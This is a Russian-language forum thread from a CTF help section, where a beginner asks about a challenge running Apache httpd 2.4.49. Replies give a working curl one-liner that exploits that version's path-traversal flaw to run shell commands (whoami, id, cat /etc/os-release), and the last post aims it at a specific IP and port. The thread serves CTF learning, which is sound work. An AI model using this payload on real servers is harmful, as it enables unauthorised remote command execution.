HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.11.2023, 19:06
Jacob Guitarrero
Новичок
Регистрация: 25.11.2023
Сообщений: 0
С нами: 1300336

Репутация: 0
По умолчанию

Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
 
Ответить с цитированием

  #2  
Старый 28.11.2023, 20:02
Exited3n
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами: 2086530

Репутация: 0


По умолчанию

Цитата:

Jacob Guitarrero сказал(а):

Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен

CVEшку не заюзать ?

Bash:


Код:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
 
Ответить с цитированием

  #3  
Старый 28.11.2023, 22:01
Jacob Guitarrero
Новичок
Регистрация: 25.11.2023
Сообщений: 0
С нами: 1300336

Репутация: 0
По умолчанию

Цитата:

Exited3n сказал(а):

CVEшку не заюзать ?

Bash:


Код:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
 
Ответить с цитированием

  #4  
Старый 28.11.2023, 22:30
Exited3n
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами: 2086530

Репутация: 0


По умолчанию

Цитата:

Jacob Guitarrero сказал(а):

это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?

Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.
 
Ответить с цитированием

  #5  
Старый 29.11.2023, 10:50
GoBL1n
Новичок
Регистрация: 02.03.2017
Сообщений: 0
С нами: 4841507

Репутация: 0
По умолчанию

Цитата:

Jacob Guitarrero сказал(а):

это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?

судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
 
Ответить с цитированием

  #6  
Старый 29.11.2023, 18:38
Jacob Guitarrero
Новичок
Регистрация: 25.11.2023
Сообщений: 0
С нами: 1300336

Репутация: 0
По умолчанию

Цитата:

GoBL1n сказал(а):

судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))

самое собой изучать его, но этого не достаточно для решения данной задачи
 
Ответить с цитированием

  #7  
Старый 29.11.2023, 22:25
Exited3n
Постоянный
Регистрация: 28.05.2022
Сообщений: 800
С нами: 2086530

Репутация: 0


По умолчанию

Цитата:

Jacob Guitarrero сказал(а):

самое собой изучать его, но этого не достаточно для решения данной задачи

Серьезно ?
Код:
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.
 
Ответить с цитированием

  #8  
Старый 30.12.2024, 01:47
M4x
Новичок
Регистрация: 20.05.2024
Сообщений: 0
С нами: 1046281

Репутация: 0
По умолчанию

Цитата:

Exited3n сказал(а):

curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

Можно и без Content-Type:

Bash:


Код:
curl
'62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo; whoami && id && cat /etc/os-release'
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.